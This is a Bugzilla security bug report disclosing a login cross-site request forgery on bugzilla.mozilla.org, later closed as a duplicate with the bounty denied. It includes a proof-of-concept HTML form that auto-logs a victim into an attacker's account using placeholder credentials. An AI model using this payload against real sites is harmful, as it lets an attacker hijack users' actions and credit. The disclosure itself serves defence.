Closed
Bug 963687
Opened 10 years ago
Closed 10 years ago
Switching a user to another account
Categories
(Bugzilla :: User Accounts, defect)
Bugzilla
User Accounts
Tracking
()
RESOLVED
DUPLICATE
of bug 713926
People
(Reporter: dawid, Unassigned)
Details
(Whiteboard: [site:bugzilla.mozilla.org][reporter-external])
User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; McAfee; MAARJS) Steps to reproduce: It is possible to log in the user to another account (CSRF attack). Steps to reproduce: User logs in to his account and then the following actions are performed: 1. Enter http://bugzilla.mozilla.org/index.cgi?logout=1 to log out the user. 2. Then log the user to another account. POC (for demonstration purposes with Submit button; normally sent automatically): <html> <body> <form action="https://bugzilla.mozilla.org/index.cgi" method="POST"> <input type="hidden" name="Bugzilla_login" value="E-MAIL_ATTACKER" /> <input type="hidden" name="Bugzilla_password" value="PASSWORD_ATTACKER" /> <input type="hidden" name="GoAheadAndLogIn" value="Log in" /> <input type="submit" value="Submit request" /> </form> </body> </html> It is assumed, that E-MAIL_ATTACKER with PASSWORD_ATTACKER exists. There might be different reasons for the attacker to launch this attack. An exemplary one is getting a credit/bounty for a submitted bug (The attacker logs the user into his account. The user thinks, that he uses his own account and submits a bug. The action is done from the attacker's account and the credit/bounty goes to the attacker). Regards, Dawid Czagan
Updated•10 years ago
|
Flags: sec-bounty?
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?]
Updated•10 years ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Updated•10 years ago
|
Flags: sec-bounty? → sec-bounty-
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?] → [site:bugzilla.mozilla.org][reporter-external]
Updated•10 years ago
|
Group: bugzilla-security
You need to log in
before you can comment on or make changes to this bug.
Description
•